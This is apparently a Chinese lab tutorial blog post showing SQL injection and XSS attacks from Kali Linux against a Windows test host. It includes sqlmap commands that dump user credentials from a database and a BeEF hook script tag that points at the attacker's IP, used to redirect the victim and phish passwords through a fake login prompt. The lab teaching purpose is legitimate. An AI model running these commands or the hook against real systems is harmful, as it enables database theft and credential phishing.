网络安全:Kali Linux 进行SQL注入与XSS漏洞利用

已于 2024-03-27 17:27:06 修改
阅读量1.2k 收藏 19
点赞数 20
分类专栏: 网络安全 文章标签: web安全 linux xss 运维 安全
于 2024-03-27 17:19:51 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cronaldo91/article/details/137080606
版权

目录

一、实验

1.环境

2.Kali Linux 进行SQL注入

3.Kali Linux 进行XSS漏洞利用

二、问题

1.XSS分类

2.如何修改beef-xss的密码

3.beef-xss 服务如何管理

4.运行beef报错

5.beef 命令的颜色有哪些区别

6.owasp-top-10 有哪些变化

一、实验

1.环境

(1)主机

表1  主机

系统版本IP备注
Kali Linux2022.4

192.168.204.154(动态)

Windows10192.168.204.10Kali(2022.4)的目标主机

(2)查看Kali Linux (2022.4)系统版本

cat /etc/os-release

(3) 查看Kali Linux (2022.4)系统IP地址

ip addr | grep 154

(4)Windows 查看IP地址

ipconfig

(5)Kali主机 ping Windows主机

ping  192.168.204.10

2.Kali Linux 进行SQL注入

(1) LAMP(LNMP)平台

选择Windows版本

https://www.xp.cn/download.html

(2)sqlmap查阅

https://github.com/sqlmapproject/sqlmap

(3)获取服务器信息

包括操作系统、数据库、 web 容器、后端语⾔

sqlmap -u http://192.168.204.10/news/list.php?id=46

(4)获取数据名称列表

--thread 10  线程数设置为10

sqlmap -u http://192.168.204.10/news/show.php?id=46 --thread 10 -dbs

(5)获取当前数据库名称

sqlmap -u http://192.168.204.10/news/show.php?id=46 --current-db

(6)获取当前数据库中所有表的名称

sqlmap -u http://192.168.204.10/news/show.php?id=46 -D news --tables

(7)获取当前数据库指定的表的字段名

sqlmap -u http://192.168.204.10/news/show.php?id=46 -D news -T news_users --columns

(8)获取指定库指定表指定字段的值

sqlmap -u http://192.168.204.10/news/show.php?id=46 -D news -T news_users -C username,password --dump

3.Kali Linux 进行XSS漏洞利用

(1)漏洞测试平台

选择Windows版本

https://github.com/zhuifengshaonianhanlu/pikachu

(2)kali 系统更新

sudo apt-get update

(3)安装ruby

apt-get install ruby

(4)安装beef

apt-get install beef-xss

(5)启动beef-xss

┌──(root㉿kali)-[~]
└─# beef-xss
[-] You are using the Default credentials
[-] (Password must be different from "beef")
[-] Please type a new password for the beef user:

┌──(root㉿kali)-[~]
└─# beef-xss
[-] You are using the Default credentials
[-] (Password must be different from "beef")
[-] Please type a new password for the beef user:
[i] GeoIP database is missing
[i] Run geoipupdate to download / update Maxmind GeoIP database
[*] Please wait for the BeEF service to start.
[*]
[*] You might need to refresh your browser once it opens.
[*]
[*]  Web UI: http://127.0.0.1:3000/ui/panel
[*]    Hook: <script src="http://<IP>:3000/hook.js"></script>
[*] Example: <script src="http://127.0.0.1:3000/hook.js"></script>

● beef-xss.service - beef-xss
     Loaded: loaded (/lib/systemd/system/beef-xss.service; disabled; preset: disabled)
     Active: active (running) since Wed 2024-03-27 10:57:29 CST; 5s ago
   Main PID: 26104 (ruby)
      Tasks: 4 (limit: 2248)
     Memory: 92.8M
        CPU: 3.246s
     CGroup: /system.slice/beef-xss.service
             └─26104 ruby /usr/share/beef-xss/beef

3月 27 10:57:34 kali beef[26104]: == 24 CreateAutoloader: migrated (0.0013s) ====================================
3月 27 10:57:34 kali beef[26104]: == 25 CreateXssraysScan: migrating ============================================
3月 27 10:57:34 kali beef[26104]: -- create_table(:xssraysscans)
3月 27 10:57:34 kali beef[26104]:    -> 0.0016s
3月 27 10:57:34 kali beef[26104]: == 25 CreateXssraysScan: migrated (0.0016s) ===================================
3月 27 10:57:34 kali beef[26104]: [10:57:33][*] BeEF is loading. Wait a few seconds...
3月 27 10:57:34 kali beef[26104]: [10:57:34][!] [AdminUI] Error: Could not minify 'BeEF::Extension::AdminUI::API::Handler' JavaScript file: Invalid option: harmony
3月 27 10:57:34 kali beef[26104]: [10:57:34]    |_  [AdminUI] Ensure nodejs is installed and `node' is in `$PATH` !
3月 27 10:57:34 kali beef[26104]: [10:57:34][!] [AdminUI] Error: Could not minify 'BeEF::Extension::AdminUI::API::Handler' JavaScript file: Invalid option: harmony
3月 27 10:57:34 kali beef[26104]: [10:57:34]    |_  [AdminUI] Ensure nodejs is installed and `node' is in `$PATH` !

[*] Opening Web UI (http://127.0.0.1:3000/ui/panel) in: 5... 4... 3... 2... 1...

(6)浏览器登录

http://127.0.0.1:3000/ui/authentication

(7) 输入账号密码

账号输⼊beef,密码输⼊123456

进入系统

(8) Windows 主机设置钩子

 <script src="http://192.168.204.154:3000/hook.js"></script>

(9)beef获取目标主机

(10)查看模块

(11)选择重定向

执行 (选择Execute)

(12) Windows 主机页面重定向

(13)选择pretty theft

 执行 (选择Execute)

(14)Windows主机弹出登录界面

(15)beef获取账号及密码

二、问题

1.XSS分类

(1)类别

1)反射型XSS

2)持久型XSS
 
3)DOM型XSS

2.如何修改beef-xss的密码

(1)修改

vim /etc/beef-xss/config.yaml

(第7、8⾏)

3.beef-xss 服务如何管理

(1)开启服务

1)第一种方式
任意目录,直接输入命令:beef-xss 打开 ,过5秒左右,然后它自动会打开命令行和浏览器beef的登录框

2)第二种方式
进入/usr/share/beef-xss/,输入命令:./beef-xss 打开 ,然后手动打开浏览器链接

(2)服务管理

1)开启beef服务
systemctl start beef-xss.service      

2)关闭beef服务
systemctl stop beef-xss.service        

3)重启beef服务
systemctl restart beef-xss.service

4.运行beef报错

(1)报错

(2)原因分析

需要管理员操作。

(3)解决方法

切换为管理员操作。

5.beef 命令的颜色有哪些区别

(1)区别

1)绿⾊
命令模块可以在⽬标浏览器上运⾏,且⽤户不会感到任何异常

2)灰⾊
命令模块尚未针对⽌⼀⼝此⽬标进⾏验证,不知道是否可运⾏

3)橙⾊
命令模块可以在⽬标浏览器上运⾏,但是⽤户可能会感到异常(例如弹窗、提示、跳转等)

4)红⾊
命令模块不适⽤于此⽬标

6.owasp-top-10 有哪些变化

(1)官网

http://www.owasp.org.cn/OWASP-CHINA/owasp-project/2021-owasp-top-10/

(2)变化

最近2次的变化

cronaldo91
关注
  • 20
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 5
    评论
专栏目录
教主Kali与Python黑客.6.WEB攻击.3.XSS
10-14
教主Kali与Python黑客.6.WEB攻击.3.XSS
kalitools:Kali Linux工具清单
02-03
kalitools:Kali Linux工具清单
groovy怎样从sql语句中截取表名_菜鸡浅谈SQL注入
weixin_40004051的博客
11-16 247
Web-SQL注入漏洞介绍:SQL注入漏洞SQL injection)是Web层面最高危的漏洞之一。在2008年至2010年期间,SQL注入漏洞连续3年在OWASP年度十大漏洞排行中排名第一漏洞原理:SQL注入是因为后台SQL语句拼接了用户的输入,而且Web应用程序对用户输入数据的合法性没有判断和过滤,前端传入后端的参数是攻击者可控的,攻击者可以通过构造不同的SQL语句来实现对数据库的任意操作。...
Kali Linux-网络安全之-XSS 跨站脚本攻击原理及 DVWA 靶机的搭建
Button12138的博客
12-09 1368
我们输入的信息被存放在name。
如何保护 Linux 数据库免受 SQL 注入攻击?
网络技术联盟站
06-17 163
SQL 注入是一种常见的网络攻击类型,它利用应用程序对用户输入的不充分验证和过滤,导致恶意用户可以通过注入恶意的 SQL 代码来执行未授权的数据库操作。为了保护 Linux 系统上的数据库免受 SQL 注入攻击,我们需要采取一系列的安全措施和最佳实践。本文将详细介绍如何保护 Linux 数据库免受 SQL 注入攻击。
Linux下五大著名的免费SQL注入漏洞扫描工具
weixin_34279184的博客
11-24 1309
大量的现代企业采用Web应用程序与其客户无缝地连接到一起,但由于不正确的编码,造成了许多安全问题。Web应用程序中的漏洞可使黑客获取对敏感信息(如个人数据、登录信息等)的直接访问。 Web应用程序准许访问者提交数据,并可通过互联网从数据库中检索数据。而数据库是多数Web应用程序的心脏。数据库维持着Web应用程序将特定内容交给访问者的数据,Web应用程序在...
网络安全常见漏洞类型?常见windows/Linux漏洞有哪些
程序员三九的博客
12-21 559
漏洞是指系统在其开发过程中由于没有考虑周全或编码错误等原因而导致的错误,可使攻击者利用漏洞对系统进行攻击,窃取信息或控制系统。漏洞虽然不是安全事件,但它是安全事件的根源,只有发现并修复漏洞才能够预防安全事件的发生。
操作系统安全kalilinux简介.ppt
06-01
运行这个命令,并将输出放到一个名为newpasswordlist.txt的文本文件中,可用如下实例输入: * 通常,用户利用Nmap来进行网络系统安全的评估,而黑客则利用扫描网络。例如,通过向远程主机发送探测数据包,获取主机的...
基于Kali LinuxSQL注入微信后台测试研究.pdf
09-06
基于Kali LinuxSQL注入微信后台测试研究.pdf
计算机病毒与防护:SQL注入漏洞的利用.ppt
06-10
使用示例-使用Sqlmap获取DVWA数据 (6)判断列名:root@kali:~# sqlmap -r /etc/url -D dvwa -T users –column 单击此处添加标题 * * * * * * * * * * * * * * * * 目录页 SQL注入漏洞的利用 数据提取方式 数据提取...
web渗透测试详细入门实践课程-kali/sql注入
06-20
渗透中期(利用漏洞信息进行渗透攻击、获取权限) 渗透后期(后渗透维持攻击、文件拷贝、代码植入、痕迹擦除) 渗透测试定义 渗透测试就是一种模拟恶意攻击者的技术与方法,挫败目标系统安全控制措施,取得访问...
Kali渗透测试之DVWA系列4——反射型XSS(跨站脚本攻击)
浅浅的博客
05-11 3563
目录 一、XSS 1、XSS简介 2、XSS类型 3、漏洞形成的根源 二、反射型XSS 1、原理示意图​ 2、实验环境 3、实验步骤 安全级别:LOW 重定向 获取cookie 安全级...
跨站脚本攻击--利用BeEF 执行 XSS 攻击
weixin_69826880的博客
06-26 472
跨站脚本攻击是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。靶场:kali(攻击者),32位win7(被攻击者)攻击环境:kali安装BEEF,32位win7站点搭建BeEF是日前最强大的浏览器开源渗透测试框架,通过X55漏洞配合JS脚本和 Metasploit进行渗透;BeEF是基于Ruby语言编写的,并且支持图形化界面,操作简单。
Kali Linux渗透测试 089 手动漏洞挖掘-SQL注入漏洞
kevinhanser
03-23 1981
本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程 1. SQL注入 2. 测试 dvwa Low 安全级别拥有MySQL的root权限 2-1. 基于报错的检测方法 2-2. 基于布尔的检测方法 2-3. 查询字段数 2-4. 联合查询 2-5. 可以使用的函数 2-6. 使用 HackBar
网络安全安全事件管理处置 — 安全事件处置思路指导
最新发布
享你所想
04-26 479
一、处理DDOS事件 1.准备工作 2.预防工作 3.检测与分析 4.限制、消除 5.证据收集 二、处理恶意代码事件 1.准备 2.预防 3.检测与分析 4.限制 5.证据收集 6.消除与恢复 三、处理未授权访问事件 1.准备 2.预防 3.检测与分析 4.限制、消除 5.证据收集 6.恢复 四、处理复合型安全事件 1.建议
从内部防护汽车网络安全——硬件安全模块(HSM)保护ECU主处理器内部
dianqicyuyan的博客
04-23 245
HSM是一种硬件,它以物理方式封装了安全功能。其集成芯片专为IT安全应用而设计,通常具有自己的处理器核心、各种内存(RAM、ROM、闪存等)和硬件密码加速器。此外,HSM必须满足用于车辆应用的特定标准,并且极其有效的集成对于降低成本至关重要。其主要要求包括ECU应用程序和HSM之间的安全接口,以及用于分析故障的调试/测试接口。HSM必须能够以尽可能短的等待时间处理加密信息,并能够承受汽车环境中的标准温度。从根本上说,HSM通过其自己的处理器核心来执行汽车应用场景所需的所有IT安全功能。
网络安全(黑客)—2024自学
dexi1113的博客
04-16 1704
我在这里可以很肯定地告诉你:"网络安全有很好的发展前景,前沿网络安全技术即将崛起,或者说已经崛起"。
网络安全(黑客技术)—2024自学
TDJYGC的博客
04-17 1420
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
kali linux 实现sql注入
09-27
Kali Linux是一种专门用于渗透测试和安全审计的Linux发行版,它提供了强大的工具和功能来实现SQL注入攻击。要在Kali Linux上实现SQL注入,可以按照以下步骤进行操作: 1. 安装git:在终端中运行命令`apt-get install git`安装git工具。 2. 克隆sqlmap存储库:使用命令`git clone https://github.com/sqlmapproject/sqlmap.git`克隆sqlmap工具的存储库。 3. 启动目标服务器:在Kali Linux上启动目标服务器,确保服务器正在运行,并且您拥有对该服务器的合法访问权限。 4. 运行sqlmap:使用命令`sqlmap -d "mysql://user:[email protected]:3306/dvwa" -f`运行sqlmap工具,其中`user`是您的用户名,`password`是您的密码,`192.168.37.135`是目标服务器的IP地址,`3306`是MySQL的默认端口,`dvwa`是您要攻击的目标数据库。 通过执行上述步骤,您可以在Kali Linux上成功实现SQL注入攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值